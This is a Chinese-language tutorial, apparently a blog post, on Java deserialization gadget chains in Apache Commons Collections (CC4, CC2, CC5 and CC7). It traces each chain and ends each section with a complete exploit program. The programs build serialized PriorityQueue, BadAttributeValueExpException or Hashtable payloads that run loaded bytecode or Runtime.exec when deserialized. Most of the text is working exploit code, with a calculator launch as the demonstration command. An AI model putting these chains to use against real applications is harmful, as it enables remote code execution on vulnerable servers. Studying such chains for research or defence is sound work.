环境搭建
在之前环境原有代码的基础上,添加这一段代码
<dependency>
<groupId>org.apache.commons</groupId>
<artifactId>commons-collections4</artifactId>
<version>4.0</version>
</dependency>
CC4链分析
CC4可以拼接动态类的加载字节码或者反射调用
漏洞成因
我们知道之前的命令执行都离不开 transform 方法
然后我们来到了这里,寻找到了调用它的方法 compare 以及 compare当前所在类
这个时候对比两个版本的类,可以看见 collections4中这个类继承了序列化接口,而 collections3.2.2 没有
寻找上半链
找到一个类的调用的方法,需要继续向上找readObject方法的类,这样才能够保证反序列化漏洞的执行。最后找到这个 PriorityQueue 类的readObject方法。它调用了 heapify(),点击去看一下
发现调用了 siftDown方法,继续点击跟进方法
发现掉用了 siftDownUsingComparator 方法,继续点击跟进
最后来到了这里了,发现调用了 compare方法,这个方法调用了之前的危险方法
所以现在我们构造出了上半链,直接搭配CC3链就是完整的CC4链了
构造exp
CC3后半链
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.collections4.Transformer;
import org.apache.commons.collections4.functors.ChainedTransformer;
import org.apache.commons.collections4.functors.ConstantTransformer;
import org.apache.commons.collections4.functors.InstantiateTransformer;
import org.apache.commons.collections4.comparators.TransformingComparator;
import javax.xml.transform.Templates;
import java.io.*;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.PriorityQueue;
public class CC4 {
public static void main(String[] args) throws Exception{
TemplatesImpl templates = new TemplatesImpl();
Class<? extends TemplatesImpl> c = templates.getClass();
Field name = c.getDeclaredField("_name");
name.setAccessible(true);
name.set(templates,"a");
Field bytecodes = c.getDeclaredField("_bytecodes");
bytecodes.setAccessible(true);
byte[] eval = Files.readAllBytes(Paths.get("E:\\Calc.class"));
byte[][] codes = {eval};
bytecodes.set(templates,codes);
Field tfactory = c.getDeclaredField("_tfactory");
tfactory.setAccessible(true);
tfactory.set(templates,new TransformerFactoryImpl());
Transformer[] transformers = new Transformer[]{
new ConstantTransformer(TrAXFilter.class),
new InstantiateTransformer(new Class[]{Templates.class}, new Object[]{templates})
};
ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
chainedTransformer.transform(1);
}
我们需要思考怎么样构造代码代替第44行
最后添加这2行,查看他们的构造方法进行构造代码:
TransformingComparator transformingComparator = new TransformingComparator<>(chainedTransformer);
PriorityQueue priorityQueue = new PriorityQueue<>(transformingComparator);
这个时候CC3后半链+CC4前半链变成这个代码了
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.collections4.Transformer;
import org.apache.commons.collections4.functors.ChainedTransformer;
import org.apache.commons.collections4.functors.ConstantTransformer;
import org.apache.commons.collections4.functors.InstantiateTransformer;
import org.apache.commons.collections4.comparators.TransformingComparator;
import javax.xml.transform.Templates;
import java.io.*;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.PriorityQueue;
public class CC4 {
public static void main(String[] args) throws Exception{
TemplatesImpl templates = new TemplatesImpl();
Class<? extends TemplatesImpl> c = templates.getClass();
Field name = c.getDeclaredField("_name");
name.setAccessible(true);
name.set(templates,"a");
Field bytecodes = c.getDeclaredField("_bytecodes");
bytecodes.setAccessible(true);
byte[] eval = Files.readAllBytes(Paths.get("E:\\Calc.class"));
byte[][] codes = {eval};
bytecodes.set(templates,codes);
Field tfactory = c.getDeclaredField("_tfactory");
tfactory.setAccessible(true);
tfactory.set(templates,new TransformerFactoryImpl());
Transformer[] transformers = new Transformer[]{
new ConstantTransformer(TrAXFilter.class),
new InstantiateTransformer(new Class[]{Templates.class}, new Object[]{templates})
};
ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
// chainedTransformer.transform(1);
TransformingComparator transformingComparator = new TransformingComparator<>(chainedTransformer);
PriorityQueue priorityQueue = new PriorityQueue<>(transformingComparator);
serialize(priorityQueue);
unserialize("ser.bin")
}
public static void serialize(Object obj) throws IOException{
ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
oos.writeObject(obj);
}
public static Object unserialize(String Filename) throws IOException,ClassNotFoundException{
ObjectInputStream ois = new ObjectInputStream(new FileInputStream(Filename));
Object obj = ois.readObject();
return obj;
}
}
代码逻辑没有错误,实际上我们序列化反序列化后,命令并没有执行。
问题解决
我们知道序列化最后是 PriorityQueue 类,我们在它的readObject方法中进行断点调试
F8来到这里,然后按F7进入到这。
size 是 0,所以并没有调用方法走出方法了。
alt + f8可以进行位运算 2>>>1 ,可以看见是为1。我们需要想办法将 size 的值改为2
我们按照这种思路 将优先队列 priorityQueue类进行添加元素:
priorityQueue.add(1);
priorityQueue.add(2);
虽然这里命令执行了,但是反序列化的时候并没有触发。
这就出现了一个问题了,本地执行了,反序列化没执行。我们点击add方法,最后跟进到这里了,回到了compare 方法
也就是说我们要做的事情就是序列化之前的时候不执行命令,反序列化的时候才可以执行。
反射修改代码:
Class tc = transformingComparator.getClass();
Field transformer = tc.getDeclaredField("transformer");
transformer.setAccessible(true);
transformer.set(transformingComparator,chainedTransformer);
去找到对应的构造方法复制属性就好了
最终exp代码:
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.collections4.Transformer;
import org.apache.commons.collections4.functors.ChainedTransformer;
import org.apache.commons.collections4.functors.ConstantTransformer;
import org.apache.commons.collections4.functors.InstantiateTransformer;
import org.apache.commons.collections4.comparators.TransformingComparator;
import javax.xml.transform.Templates;
import java.io.*;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.PriorityQueue;
public class CC4 {
public static void main(String[] args) throws Exception{
TemplatesImpl templates = new TemplatesImpl();
Class<? extends TemplatesImpl> c = templates.getClass();
Field name = c.getDeclaredField("_name");
name.setAccessible(true);
name.set(templates,"a");
Field bytecodes = c.getDeclaredField("_bytecodes");
bytecodes.setAccessible(true);
byte[] eval = Files.readAllBytes(Paths.get("E:\\Calc.class"));
byte[][] codes = {eval};
bytecodes.set(templates,codes);
Transformer[] transformers = new Transformer[]{
new ConstantTransformer(TrAXFilter.class),
new InstantiateTransformer(new Class[]{Templates.class}, new Object[]{templates})
};
ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
// chainedTransformer.transform(1);
TransformingComparator transformingComparator = new TransformingComparator<>(new ConstantTransformer<>(1));
PriorityQueue priorityQueue = new PriorityQueue<>(transformingComparator);
priorityQueue.add(1);
priorityQueue.add(2);
//序列化的时候改回来执行的代码
Class tc = transformingComparator.getClass();
Field transformer = tc.getDeclaredField("transformer");
transformer.setAccessible(true);
transformer.set(transformingComparator,chainedTransformer);
serialize(priorityQueue);
unserialize("ser.bin");
}
public static void serialize(Object obj) throws IOException{
ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
oos.writeObject(obj);
}
public static Object unserialize(String Filename) throws IOException,ClassNotFoundException{
ObjectInputStream ois = new ObjectInputStream(new FileInputStream(Filename));
Object obj = ois.readObject();
return obj;
}
}
可以看见反序列化命令执行成功。
总结
这条链可以在 commons-collections4.0 版本中使用
CC2链分析-无数组
CC2链是CC4链的修改版,目的是为了不使用 Transformer 数组。我们知道 CC4链的后半段离不开是这个
TemplatesImpl.newTransformer() --> defineClass->newInstance
所以在CC2链中采取了直接调用 newTransformer 方法,使用了 InvokerTransformer方法调用
构造exp
所以直接照搬CC4的代码就好了,然后进行修改。
CC4后半链代码:
TemplatesImpl templates = new TemplatesImpl();
Class<? extends TemplatesImpl> c = templates.getClass();
Field name = c.getDeclaredField("_name");
name.setAccessible(true);
name.set(templates,"a");
Field bytecodes = c.getDeclaredField("_bytecodes");
bytecodes.setAccessible(true);
byte[] eval = Files.readAllBytes(Paths.get("E:\\Calc.class"));
byte[][] codes = {eval};
bytecodes.set(templates,codes);
使用 InvokerTransformer方法调用 newTransformer 方法。
InvokerTransformer<Object, Object> newTransformer = new InvokerTransformer<>("newTransformer", new Class[]{}, new Object[]{});
修改前半链的CC4代码:
TransformingComparator transformingComparator = new TransformingComparator<>(new ConstantTransformer<>(1));
PriorityQueue priorityQueue = new PriorityQueue<>(transformingComparator);
priorityQueue.add(templates);
priorityQueue.add(1);
//序列化的时候改回来执行的代码
Class tc = transformingComparator.getClass();
Field transformer = tc.getDeclaredField("transformer");
transformer.setAccessible(true);
transformer.set(transformingComparator,newTransformer);
- priorityQueue添加 templates 元素是为了,加载 TemplatesImpl 的这个类
这样才能执行后半链代码的内容,从而构造exp代码:
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.ConstantTransformer;
import org.apache.commons.collections4.functors.InvokerTransformer;
import java.io.*;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.PriorityQueue;
public class CC2 {
public static void main(String[] args) throws Exception{
TemplatesImpl templates = new TemplatesImpl();
Class<? extends TemplatesImpl> c = templates.getClass();
Field name = c.getDeclaredField("_name");
name.setAccessible(true);
name.set(templates,"a");
Field bytecodes = c.getDeclaredField("_bytecodes");
bytecodes.setAccessible(true);
byte[] eval = Files.readAllBytes(Paths.get("E:\\Calc.class"));
byte[][] codes = {eval};
bytecodes.set(templates,codes);
InvokerTransformer<Object, Object> newTransformer = new InvokerTransformer<>("newTransformer", new Class[]{}, new Object[]{});
TransformingComparator transformingComparator = new TransformingComparator<>(new ConstantTransformer<>(1));
PriorityQueue priorityQueue = new PriorityQueue<>(transformingComparator);
priorityQueue.add(templates);
priorityQueue.add(1);
//序列化的时候改回来执行的代码
Class tc = transformingComparator.getClass();
Field transformer = tc.getDeclaredField("transformer");
transformer.setAccessible(true);
transformer.set(transformingComparator,newTransformer);
serialize(priorityQueue);
unserialize("ser.bin");
}
public static void serialize(Object obj) throws IOException {
ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
oos.writeObject(obj);
}
public static Object unserialize(String Filename) throws IOException,ClassNotFoundException{
ObjectInputStream ois = new ObjectInputStream(new FileInputStream(Filename));
Object obj = ois.readObject();
return obj;
}
}
反序列化代码后,可以看见命令执行成功!
总结
和CC4的利用的版本范围都是一样的,可以在 commons-collections4.0 版本中使用。只是修改了调用链的思路,和CC4差不多。
CC5链分析
官方的CC5链子:
https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/CommonsCollections5.java
可以发现CC5链子 大半后半链都是CC1的链子,只是前面不一样了
下面是CC1的链子:
从LazyMap.get()以上开始就不一样了
分析上层链
TiedMapEntry.toString链
直接看LazyMap类的get方法,然后向上寻找调用它的类的方法名
在TiedMapEntry类中的toString方法可以看见调用了一个getVAlue方法
根据该方法可以看见来到了 get方法里
从而意味这这个类的方法是可控的。
原版CC1链的后半链代码:
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.LazyMap;
import java.lang.reflect.Method;
import java.util.HashMap;
import java.util.Map;
import java.io.*;
public class CC5 {
public static void main(String[] args) throws Exception{
Transformer[] transformers = new Transformer[]{
new ConstantTransformer(Runtime.class),
new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",null}),
new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null,null}),
new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"})
};
ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
HashMap<Object, Object> hashMap = new HashMap<>();
Map lazymap = LazyMap.decorate(hashMap, chainedTransformer);
Class<LazyMap> lazyMapClass = LazyMap.class;
Method get = lazyMapClass.getMethod("get", Object.class);
get.invoke(lazymap,chainedTransformer);
}
}
可以看见可以正常的命令执行
现在我们修改代码为刚刚分析的 TiedMapEntry的toString方法进行命令执行:
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;
import java.io.*;
import java.util.HashMap;
import java.util.Map;
public class CC5 {
public static void main(String[] args) throws Exception{
Transformer[] transformers = new Transformer[]{
new ConstantTransformer(Runtime.class),
new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",null}),
new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null,null}),
new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"})
};
ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
HashMap<Object, Object> hashMap = new HashMap<>();
Map lazymap = LazyMap.decorate(hashMap, chainedTransformer);
Class<LazyMap> lazyMapClass = LazyMap.class;
// Method get = lazyMapClass.getMethod("get", Object.class);
// get.invoke(lazymap,chainedTransformer);
//这两行代替前面的两行注释
TiedMapEntry tiedMapEntry = new TiedMapEntry(lazymap, null);
tiedMapEntry.toString();
}
}
最后getValue方法调用了get方法。
运行代码可以看见我们的构造链成功命令执行了
BadAttributeValueExpException.readObject入口类链
根据官方链,我们来到入口类,可以看见 BadAttributeValueExpException 类的构造方法是可控的。而且它的传参值调用了toString方法,也就是说我们可以利用这个点来命令执行,接上了 TiedMapEntry的类。
而且这个类还拥有了readObject方法。
从而我们先构造一个exp代码:
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;
import javax.management.BadAttributeValueExpException;
import java.io.*;
import java.util.HashMap;
import java.util.Map;
public class CC5 {
public static void main(String[] args) throws Exception{
Transformer[] transformers = new Transformer[]{
new ConstantTransformer(Runtime.class),
new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",null}),
new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null,null}),
new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"})
};
ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
HashMap<Object, Object> hashMap = new HashMap<>();
Map lazymap = LazyMap.decorate(hashMap, chainedTransformer);
Class<LazyMap> lazyMapClass = LazyMap.class;
// Method get = lazyMapClass.getMethod("get", Object.class);
// get.invoke(lazymap,chainedTransformer);
//这两行代替前面的两行注释
TiedMapEntry tiedMapEntry = new TiedMapEntry(lazymap, null);
// tiedMapEntry.toString();
BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException(tiedMapEntry);
可以看见 BadAttributeValueExpException类传的 TiedMapEntry类的变量,可以看见成功调用了toString且命令执行了
最终exp
可以发现上层链的构造思路是可行的。我们的目的是序列化之前不进行命令执行,是在反序列化的时候命令执行。所以我们需要利用到反射修改 BadAttributeValueExpException类的属性。
执行代码的时候不行,序列化的时候改回来执行代码的属性。将 val的传参现改为 null,或者其他没用的
BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException(null);
Class<? extends BadAttributeValueExpException> b = badAttributeValueExpException.getClass();
Field val = b.getDeclaredField("val");
val.setAccessible(true);
val.set(badAttributeValueExpException,tiedMapEntry);
最终exp代码:
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;
import javax.management.BadAttributeValueExpException;
import java.io.*;
import java.lang.reflect.Field;
import java.util.HashMap;
import java.util.Map;
public class CC5 {
public static void main(String[] args) throws Exception{
Transformer[] transformers = new Transformer[]{
new ConstantTransformer(Runtime.class),
new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",null}),
new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null,null}),
new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"})
};
ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
HashMap<Object, Object> hashMap = new HashMap<>();
Map lazymap = LazyMap.decorate(hashMap, chainedTransformer);
Class<LazyMap> lazyMapClass = LazyMap.class;
// Method get = lazyMapClass.getMethod("get", Object.class);
// get.invoke(lazymap,chainedTransformer);
//这两行代替前面的两行注释
TiedMapEntry tiedMapEntry = new TiedMapEntry(lazymap, null);
// tiedMapEntry.toString();
BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException(null);
Class<? extends BadAttributeValueExpException> b = badAttributeValueExpException.getClass();
Field val = b.getDeclaredField("val");
val.setAccessible(true);
val.set(badAttributeValueExpException,tiedMapEntry);
serialize(badAttributeValueExpException);
unserialize("ser.bin");
}
public static void serialize(Object obj) throws IOException{
ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
oos.writeObject(obj);
}
public static Object unserialize(String Filename) throws IOException,ClassNotFoundException{
ObjectInputStream ois = new ObjectInputStream(new FileInputStream(Filename));
Object o = ois.readObject();
return o;
}
}
最后只进行反序列化代码,可以看见命令执行成功。
总结
CC5比CC1的代码更加简便,不需要代理。通过 TiedMapEntry类的toString方法进行代替,调用后面的LazyMap类。是CC1的变种版
CC7链分析
环境搭建
Commons Collections 3.2.1
JDK8u65
官方利用链
官方CC7链:
https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/CommonsCollections7.java
对比CC1从LazayMap上层开始,就不一样了
实际上这两个equals方法,其中第一行是父类,第二行是子类。在java中,在java中,如果父类方法先执行,如果父类方法不能满足,就会去执行子类方法如果父类方法先执行,而子类中也有同名方法,且满足调用条件,会执行子类方法,不会再继续执行父类方法。
org.apache.commons.collections.map.AbstractMapDecorator.equals
java.util.AbstractMap.equals
分析equals方法链
我们直接来到 AbstractMap类的 equals 方法中,可以发现调用了get方法
为了走到equals调用 get(key)方法。我们需要绕过前面的代码,全部都返回为fasle,且键名不能相同。
从而构造exp:
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.LazyMap;
import java.util.HashMap;
import java.util.Map;
import java.io.*;
public class CC7 {
public static void main(String[] args) throws Exception{
Transformer[] transformers = new Transformer[]{
new ConstantTransformer(Runtime.class),
new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",null}),
new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null,null}),
new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"})
};
ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
HashMap<Object, Object> hashMap = new HashMap<>();
Map lazymap = LazyMap.decorate(hashMap, chainedTransformer);
lazymap.put("1","2");
HashMap<Object, Object> hashMap1 = new HashMap<>();
Map lazymap1 = LazyMap.decorate(hashMap1, chainedTransformer);
lazymap1.put("3","4");
lazymap.equals(lazymap1);
}
}
运行之后可以看见命令执行成功,证实了equals方法链能够利用
LazyMap类调用了map父类的构造方法,且AbstractMapDecorator类的 equals方法也是用 map的类型调用的
因为LazyMap1也是Map类型,所以可以调用一个hashMap.equals()传入它。
exp代码构造:
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.LazyMap;
import java.util.HashMap;
import java.util.Map;
import java.io.*;
public class CC7 {
public static void main(String[] args) throws Exception{
Transformer[] transformers = new Transformer[]{
new ConstantTransformer(Runtime.class),
new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",null}),
new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null,null}),
new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"})
};
ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
HashMap<Object, Object> hashMap = new HashMap<>();
Map lazymap = LazyMap.decorate(hashMap, chainedTransformer);
lazymap.put("1","2");
HashMap<Object, Object> hashMap1 = new HashMap<>();
Map lazymap1 = LazyMap.decorate(hashMap1, chainedTransformer);
lazymap1.put("3","4");
hashMap.equals(lazymap1);
}
}
可以看见命令执行成功
分析入口类链
来到 Hashtable类的 readObject方法中可以看见调用了 reconstitutionPut 方法
跟进 reconstitutionPut 方法,可以发现调用 key变量调用了equals方法
但是要调用它的方法有个条件,就是不同的key的hash值要相同。
所以在这里我们分析出了,Hashtable的两个不同键名如果相同就会调用 equals方法。入口类反序列化就成功了
最终exp
删除yy的意义
- lazymap1.remove(“yy”);
删除 lazymap1的 yy的键名,是因为 LazyMap的get方法中把 yy 写入到了 lazymap1中了
如果不删除yy,这里就不会通过比较了
为什么是yy和zZ?
前面说过了,在 Hashtable入口类中调用了 reconstitutionPut 方法,如果两个不同的key的hash不同也就不会调用,而yy和zZ的hash值是相同的。
最终代码如下:
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.LazyMap;
import java.io.*;
import java.lang.reflect.Field;
import java.util.HashMap;
import java.util.Hashtable;
import java.util.Map;
public class CC7 {
public static void main(String[] args) throws Exception{
Transformer[] transformers = new Transformer[]{
new ConstantTransformer(Runtime.class),
new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",null}),
new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null,null}),
new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"})
};
ChainedTransformer chainedTransformer = new ChainedTransformer(new Transformer[]{});
Map lazymap = LazyMap.decorate(new HashMap(), chainedTransformer);
Map lazymap1 = LazyMap.decorate(new HashMap(), chainedTransformer);
lazymap.put("yy",1);
lazymap1.put("zZ",1);
Hashtable<Object, Object> hashtable = new Hashtable<>();
hashtable.put(lazymap,1);
hashtable.put(lazymap1,1);
Class<ChainedTransformer> c = ChainedTransformer.class;
Field iTransformers = c.getDeclaredField("iTransformers");
iTransformers.setAccessible(true);
iTransformers.set(chainedTransformer,transformers);
lazymap1.remove("yy");
serialize(hashtable);
unserialize("ser.bin");
}
public static void serialize(Object obj) throws IOException{
ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
oos.writeObject(obj);
}
public static Object unserialize(String Filename) throws IOException,ClassNotFoundException{
ObjectInputStream ois = new ObjectInputStream(new FileInputStream(Filename));
Object o = ois.readObject();
return o;
}
}
反序列化之后可以看见命令执行成功
总结
难点在于hash值碰撞的理解,还有equals方法的调用。我觉得是CC1版本的变种
